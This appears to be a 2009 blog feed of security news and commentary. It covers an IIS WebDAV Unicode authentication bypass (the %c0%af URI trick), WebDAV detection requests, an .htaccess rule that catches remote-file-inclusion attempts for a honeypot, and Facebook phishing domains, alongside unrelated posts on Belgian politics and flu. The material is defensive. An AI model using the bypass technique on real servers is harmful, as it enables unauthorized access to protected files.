• webdav hacking campaign, find vulnerable server before hackers do

    IIS 6 sites with the WebDAV extension enabled may be vulnerable to authentication bypass because of a bug in the way that the extension handles Unicode characters.

    Cutting the URI path with random Unicode characters allows hackers to bypass the access control list. Depending on the permissions of the Web server files, a hacker would be able to retrieve user names and passwords, upload, overwrite and delete files, or run malicious code.

    Use the WebTuff utility to check your system vulnerability:

    1.  Try to retrieve the file at the given URI using a simple WebDAV GET command

    2.  Try to retrieve the file at the given URI using a simple WebDAV GET command, cutting the URI with these Hex | Unicode characters: %c0 and %af.

    3.  Save the retrieved file locally and / or report server response

    Download WebTuff Tool:

    webTuff link (zip file containing win32 binary + Python source code)

    WebTuff-MD5 (MD5 hash of WebTuff binary)


    http://www.applicure.com/News/WebDAV_Exploit

  • Apple has to put some security in its 5 month old java bug

    If you don't agree you can protest at Apple http://www.apple.com/feedback/macosx.html and ask them why they are taken so long to fix a bug that has been fixed by Sun in DECEMBER.

    Secondly your mac can be hacked by any specially crafted package on a website, even if you have patched and secured your machine.

    You can only stop this meanwhile by

    * disabling the downloading safe files

    * dumping Safari crap and take a real browser

    * disable the java in Safari if you still want to use that crap

    If you are not running mac, you should however fix this bug here

    http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1

    Lets hope that the java and mac update processes become more professional.
    Macromedia has already decided to re-organise its updateprocess although a 3month period is much too long. It looks like Oracle patch process.

  • belnet, the Belgian official internetworks mostly attacked by chinese networks

    2. Top scanners from their newsletter

    # | Region / Domain

    4345 | Zigong Sciences Informations Academe

    933 | Flexwebhosting B.V

    886 | CHINANET anhui province network

    850 | China Unicom Heilongjiang Province Network

    591 | Ministry of Water and Irrigation

    556 | China Unicom Beijing province network

    556 | Sichuan Public Information Industry Co.Ltd IDC

    501 | CHINANET Anhui province network

    452 | CHINANET-HN Zhuzhou node network

    434 | CHINANET jiangsu province network

     

    +++ 3. Top scanned ports

    # | port # | service

    5849 | 1434 / udp |Microsoft SQL Monitor 3950 |

    445 / tcp | Windows File-&Print Sharing - SMB 1788 |

    22 / tcp | ssh 1534 |

    1433 / tcp | 1219 |

    2967 / tcp | 872 |

    23 / tcp | 845 |

    135 / tcp | DCE Endpoint 750 |

    139 / tcp | 611 |

    1026 / udp | 604 | 4899 / tcp |
    https://cert.belnet.be/newsletters/belnet-cert-newsletter-new2009-21

    do we really need that Chinese traffic or should we whitelist it instead of blacklisting ?

  • behind the facebook campaign of Verhofstadt

    another none story hitting the presses during this boring campaign which has all the ingredients to be hardhitting but where the audiovisual media are doing everything to kill any debate and explanation that is longer than 20 seconds. I love the US debate about which so many people thought that they were empty marketing but which are very interesting compared to what the journalists are asking here and the politicians are getting as opportunity to tell. (sometimes I think that it is not because the journalist has heard the same arguments and stories and facts already a thousand times before that he or she should censor them away from their readers and viewers who didn't have access to or interest for that information before the elections).

    So he is on facebook, verhofstadt and that makes the international news ?

    http://www.facebook.com/pages/Guy-Verhofstadt/99985820015

    He has 2000 friends as member of a party with thousands more of members and sympathisers (who are mailing or spamming as crazy to get his number of friends as high as possible) and as the leading prominent candidate for the European elections (asking for the vote of millions of voters). And he has only 2000 friends ? I hope he has more votes .....

    even more remarkable, the news should not be that he has 2000 virtual friends, no the news should be that he has ONLY a bit more than 2000 friends and that all the facebook hype is more hype than having any impact on this election this time around.

  • all Openssh not 5.2 is insecure an sich

    All programs that incorporate the OpenSSH implementation of SSH, short for Secure Shell, should make sure they use version 5.2, which provides several countermeasures to prevent the attacks. Other SSH implementations may be vulnerable as well, the researchers from the Information Security Group at the University of London's Royal Holloway said.

    The attack exploits subtle differences in the way SSH software reacts when encountering errors during cryptographic processing. By directing specially manipulated packets at the application, an attacker has a one in 262,144 chance of recovering 32 bits of plaintext from an arbitrary chunk of ciphertext.


    http://www.securityfocus.com/news/11550

  • nuclear energy of the 4th generation in trouble

    The massive power plant under construction on muddy terrain on this Finnish island was supposed to be the showpiece of a nuclear renaissance. The most powerful reactor ever built, its modular design was supposed to make it faster and cheaper to build. And it was supposed to be safer, too.

    But things have not gone as planned.

    After four years of construction and thousands of defects and deficiencies, the reactor’s 3 billion euro price tag, about $4.2 billion, has climbed at least 50 percent. And while the reactor was originally meant to be completed this summer, Areva, the French company building it, and the utility that ordered it, are no longer willing to make certain predictions on when it will go online.


    http://www.nytimes.com/2009/05/29/business/energy-environment/29nuke.html?hpw

  • webdav hacking still in full force, how to find webdav servers on your networks

    Question: How can I find IIS servers in my environment running WebDAV?

    Answer: You can use the IIS Manager interface on the server to quickly tell whether the server is running WebDAV. If you want to do so remotely, you can issue an HTTP request to the server directly:

    $ telnet server 80

    OPTIONS / HTTP/1.1
    Host: server
    Accept: */*

    (An extra Enter on the blank line after the Accept will complete the request for the webserver.)

    If you get an HTTP response that looks like the one below, the server is running WebDAV.

    HTTP/1.1 200 OK
    Date: Wed, 20 May 2009 00:52:58 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    MS-Author-Via: DAV
    Content-Length: 0
    Accept-Ranges: none
    DASL:
    DAV: 1, 2
    Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIN
    D, PROPPATCH, LOCK, UNLOCK, SEARCH
    Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
    Cache-Control: private

    To evaluate the response for existence of WebDAV, use the following logic:

    • Received 2xx response status to OPTIONS request made to root of site.
    • Response contains DAV header with value 1,2.
    • Response contains MS-Author-Via header which contains DAV value.
    • Response DOES NOT contain X-MSDAVEXT header. Existence of this means its Sharepoint’s DAV.

    To test a server that only accepts HTTPS connections, you can use a tool like wfetch.


    http://blogs.technet.com/srd

  • attacks on Directshow quicktime filter

    As every applications tries to make as much own plugins for all these old and new and marginal protocols and products that are being used, vulnerabilities will continue to pop up in client software.

    Today it is the Directshow for Microsoft that is being hit by exploits for their quicktime plugin. It is even not necessary to have quicktime installed or not to open quicktime files. If you have quartz.dll, than you are vulnerable, period.

    The best workaround is this one according to Microsoft

    #1: Disable Quick Time Parsing in Quartz.dll by deleting the following registry key:

    HKEY_CLASSES_ROOTCLSID{D51BD5A0-7548-11CF-A520-0080C77EF58A}

    This is fine for a lot of networks where this operation will be set into motion
    But how do individual newbies do that without making some mistake ?
    Shouldn't you produce some script or program to do that for them ?
    Click and play ?

    You can try it this way

    For 32-bit Windows systems:

    1.

    Click Start, click Run, type Regedit in the Open box, and then click OK.

    2.

    Locate the following subkey:
    HKEY_CLASSES_ROOTCLSID{D51BD5A0-7548-11CF-A520-0080C77EF58A}

    3.

    On the File menu, click Export.

    4.

    In the Export Registry File dialog box, enter QuickTime_Parser_Backup.reg and click Save.

    Note This will create a backup of this registry key in the My Documents folder by default.

    5.

    Press the Delete key on the keyboard to delete the registry key. When prompted to delete the registry key via the Confirm Key Delete dialog box, click Yes


    sources Microsoft and ISC
    This vulnerability is being exploited right now in different forms.
  • war comes unexpectedly

    Everybody expected war in Iraq and Afghanistan and Pakistan and everybody was focusing on these wars and how to contain them.

    Meanwhile the situation in Korea is going out of hand at an incredible fast scale. Never have there been so many warpreparing acts and provocations in so few hours. The preparation for the Iraqi war took months and could be halted any minute during all this time - in theory.

    Have the impression that something is going incredible wrong there and that there should be more attention for this situation. An American General declared that the US could go to war and North Korea has suspended the truce. Yesterday they were testing rockets again. If that ain't the most dangerous situation on earth for the moment, than I don't know what is.

    For firms with links to China this can become very difficult times as nobody is sure what could happen when the first incidents at the North Korean Border (the most militarized of the world) will happen. I suppose DRP teams are getting their plans out of the box and are doing the necessary paperwork and taking the necessary decisions so everything is in place if.....

    The advantage of this is that even if nothing happens on the warfront, you are prepared when the swineflu eventually hits some regions of China big time. (You don't need a great number of infections to have huge economic effects as Mexico has shown).

    For the financial risk assessment manager. China is the economic production pool of the world. If it becomes involved in military actions or will have sanctions itself imposed on them because it helps North Korea to survive economic sanctions, the economic effects could be huge.

    The more I look at it, the more I think, What a mess. I hope somebody in North Korea gets back his cool before the train of war has left the station and there is nothing to stop it.

    Frank De Winne may in that case view the first local nuclear war on earth from the safe space station :) But that is cynical me, just joking.

  • flu : first Belgian school closed in Belgium

    They decided to close a whole school in Tervuren untill next week (The International School) because a father and his kid who came back from the US seem to be infected. As there are only 25 places in the Brussels Hospital for isolated treatment of this disease, they were all asked to stay home and not have any visits and take their medicins. Probably it will all stay under control, but you can see how fast it can go. You only need one worker back from the US or another country with some infections to have to close down your school or infrastructure for a week. (Any DRP, any housework possibilities ?).

    Normally there should be a vaccin for the present virus available in august or september, but after that it will have to be produced and distributed in time. And we should hope that meanwhile it doesn't mutate and transform itself by mixing it with the new viral flu virus or the bird flu or any other kind of flu or virus that we thought to be harmless untill now.

    We have published already the documents and checklists about preparing your institution or enterprise for Belgium and some other US reports are available at our ebooks blog.

    Don't look on influenza.be, there is no news yet about the new cases which is a pitty because this way you leave the communication solely to the media and you can only hope that everybody believes them and that the journalist stays calm and is intelligent enough to report the facts and nothing but the facts.

    With 285 kids and their families with a case that only has been discovered yesterday but in which the persons were back in Belgium since sunday you can multiply the number of people that may have been in contact or think they may have been and may now have questions or want to have a medical control or just some medicins just to be sure. There is nothing re-assuring about the website as it is today in such a case. They clairly didn't foresee that in their crisiscommunication if you call it crisiscommunication because this is the first possible small crisis and there is no official communication.

  • another case of stolen stupid emails that have legal implications

    There is a huge controversy about the plans to build a whole network of routes and bridges and tunnels in and around Antwerp. In total there are about 3 to 4 alternatives and after 13 years of study the Flemish government and the City of Antwerp (half a million citizens, one of the biggest ports of Europe) want that a final decision will be taken this year or next year at the latest.

    As usual there are some effective and professional action groups and the political parties have the last year starting to differ about which alternative to choose. In the meantime there are regional elections for the Flemish parliament (and indirectly government).

    To make it easier for the next government to take a decision the newly formed organisation which is responsable for the management of this project (BAM) has asked a permission for constructioin at the city of Antwerp. It could only do this if they also received a  Local Environmental Effect report that gave the 'green light' for the proposed construction. In this case this report had also to show why the proposed construction was better than the alternatives that the community organisations proposed. Normally that should have been done by an independent auditor, whatever that means around here.

    They finally had such a report and received the permission for the construction of their favourite proposal (and not for the other alternatives). This report was in contradiction with the other international specialised audits who investigated the three biggest alternatives and preferred one proposed by the community groups.

    Now a local flemish newsweekly says it has emails between the 'independent' auditor for the Regional environmental report and the director of the BAM that clearly shows that the argumentation for their choice of the first proposal of the BAM was written and guided by the BAM. This means that the Local Environmental Report was not made independently and can be thrown in the wastebasket. It also means that the construction permission is invalid as there is no independent Local environmental report added to it. This means that the whole work can be done over again.

    Luckily for the community groups were these people so stupid to put those things in email and keep their emails and was there somebody that leaked them.

  • belgian sentenced to 1 year of prison for emailstalking of his local administration

    It would be funny if it wouldn't be true. But hey this is the country of Magritte and Ensor.

    A judge decided today that he would side with the commune of Blankenberge and convicted its assailant to 1 year of prison because of stalking its administration with 130 mails during 3 years. (That is really a flood - so if you want to submerge a local administration around here you only have to send more than 100 mails during 3 years).

    Normally an administration can't use the law on stalking because the law is made for individuals, not for administrations or organisations. It was also the administration as a whole that sued the assailant and not one individual civil servant or elected official.

    So if this is upheld in higher court than any actiongroup or individual that is using email as an instrument to lobby for or against something - or any persistant disgruntled citizen - can be sued and eventually sentenced to one year effective in jail in Belgium.

    The guy is also prosecuted for abuse of the infrastructure of the local administration by sending so much mails. This is a joke right ? Because with this we could not only sue any commercial emailer or spammer but also any mailserver that has been hacked and is sending out emails in the thousands to infect or spam us.

    Even if the person in question was insulting and launching all kinds of threats and insinuations, than he should have been prosecuted for this, whatever the communicative means he was using to do this. If this had been the case, the argument would have been about his insinuations and threats, not about the use of email to send them. THe danger of this jurisdiction is that email will now be put in a very strict legal environment that makes sending community-action based emails out from Belgium a very dangerous act in deed.

    If you use email as a public pressure you will have to search for mailservers outside the European Union and that are not part of the Google-Microsoft-yahoo infrastructure. The fact is that the US has the best defence of freedom of speech - something we don't know around there.

    So after blogging, now it is email and what will be next that will have to migrate to the states one day to protect the possibilities of Freedom of Speech.

    Bytheway couldn't they just send an antispamfilter on his mails with an autoresponder saying that this kinds of complaints and insinuations can't be handled in the form of an informal email and had to be send as an official letter ?

  • how many twitter related applications will go down this week

    http://www.twitpocalypse.com/  a joke or for real ? Hyped up by twitter, bringing so twitter even faster on its knees

    bo33

  • webdav hacking campaign going on in full force

    Since the webdav vulnerability came about 800 danish websites were hacked by islamic hackers.

    see this http://www.zone-h.org/archive/filter=1/domain=dk/page=35

    and around 250 .nl sites http://www.zone-h.org/archive/filter=1/domain=nl/page=10

    These links will show nothing interesting in a few hours because the database is renewed. But the levels of new hacks has not been so high for months.

    IP or countryfiltering does not work as a defense against this.

    You should also totally secure your installation. Only upgrading to IIS 7 and windows 2008 is not enough if you don't implement all the rules that Microsoft has set out.

    bo32

  • help this anti RFI honeypot with a simple code on your site

    As part of the work at our lab we started to work on methods to learn more about remote file inclusion (RFI) attacks. The Internet Storm Center has developed a web-based honeypot which is available in a beta version. This honeypot can be used to collect information about different kinds of attacks, but requires the participant to install and maintain a honeypot on his own. For example, it is possible to deploy this honeypot on a OpenWrt router.
    Since we are aiming only at RFI attacks, an easier approach is to redirect incoming malicious request to a central honeypot which then aggregates the information. Jan already blogged about this idea, this posting is meant to spread the word.

    You can help us by using the following .htaccess file on your web server:

    Options +FollowSymlinks
    RewriteEngine on
    RewriteCond %{QUERY_STRING} (.+=http://.+)
    RewriteRule ^(.+)$ http://link.informatik.uni-mannheim.de/$1?%1 [R,NC]

    The script checks if the incoming request looks like an RFI attack (RewriteCond) and then redirects this request to one of our honeypots (RewriteRule). Please let us know if you have any questions or ideas.

  • vista and windows 2008 SP2 downloads available and coming

    SP2 for Vista and Windows Server 2008 is available for download from the Download Center (x86, ISO and 64-bit flavors).

    Microsoft is expected to begin pushing SP2 to users via Windows Update on June 30, according to the aforementioned company official.

    Microsoft released SP2 to manufacturing on April 30 and has been telling customers it would deliver the final SP2 bits to the public before the end of the second quarter of 2009.


    http://blogs.zdnet.com/microsoft/?p=2871&tag=nl.e019

  • IIS servers 5 and 6 under attack are you at risk ?

    You are not at risk if : (Source : Microsoft SRD Team)

    • "An IIS server not running WebDAV is safe.
      The Windows Server 2003 IIS (version 6) shipped with WebDAV disabled by default.
    • An IIS server not using IIS permissions to restrict content to authenticated users is safe.
    • An IIS server that does not grant filesystem access to the IUSR_[MachineName] account is safe.
    • An IIS server that hosts web applications using only forms-based authentication is probably safe.

    You are at risk : (Source Microsoft SRD Team, except italics by myself)

    • IF an IIS 5, 5.1, or 6.0 webserver is running with WebDAV enabled (default for IIS5);
    • AND the IIS server is using IIS permissions to restrict a subfolder of content to authenticated users;
    • AND file system access is granted for the restricted content to the IUSR_[MachineName] account;
    • AND a parent folder of the private subfolder allows anonymous access;
      THEN an anonymous remote user may be able to leverage this vulnerability to access files that normally would only be served to authenticated webserver users."

    These attacks are continuing on an intensive scale..... it is only a matter of time before they arrive at your site if you didn't fix it.

    Go to IIS 7 and leave the things off that are disabled if you don't have learned in every detail what you should and shouldn't do.

  • You can not delete your pictures from these sites

    this can change in the coming hours or days, but after an experiment during 30 days the following sites make it impossible to delete your pictures. If you have send the links there will always be a way to find your picture in cached ONLINE conten. We re-ordered it.

    Site Type CDN Operator Revocation

    Bebo Social Networking Bebo Unrevoked

    Facebook Social Networking Akamai Unrevoked

    hi5 Social Networking Akamai Unrevoked

    MySpace Social Networking Akamai Unrevoked

    SkyRock Blogging Téléfun Unrevoked

    Flickr Photo Sharing Yahoo Immediate

    LiveJournal Blogging LiveJournal Immediate*

    Orkut Social Networking Google Immediate

    Photobucket Photo Sharing Photobucket Immediate

    Windows Live Spaces Social Networking Microsoft N/A (cookies)

    Fotki Photo Sharing Fotki < 1 hour

    Picasa Photo Sharing Google 5 hours

    Xanga Blogging Xanga 6 hours*

    Blogger Blogging Google 36 hours

    Friendster Social Networking Panther Express 6 days

    Tagged Social Networking Limelight 14 days

    http://www.lightbluetouchpaper.org/2009/05/20/attack-of-the-zombie-photos

  • what happens after the .be facebook phishing

    "The form sends your stolen credentials back to bestspace.be for processing:

    <form method=”POST” action=”/?login_attempt=1″>

    Digging a little deeper we find this site is hosted on  211.95.78.98 which hosts a few other malicious domains as well:

    degunter.cn
    daratop.cn

    Doing a quick search for daratop.cn yields more hostile activity in the form of malware. Honeynet.cz has more information and so does the Malware Domains List.

    The registrant of daratop.cn is steven_lucas_2000@yahoo.com, a couple of searches for this email reveals many different attacks that this individual has been involved in.

    Example 1
    Exmaple 2

    In closing, all of these sites are hostile and should be blocked and avoided."

    source

  • new .be facebook phishing site discovered

    databus.be

    bo23 who has registered it

    bo24

    only the email address is different

    and where is it hosted - even if no dns information is found(robtex)

    bo25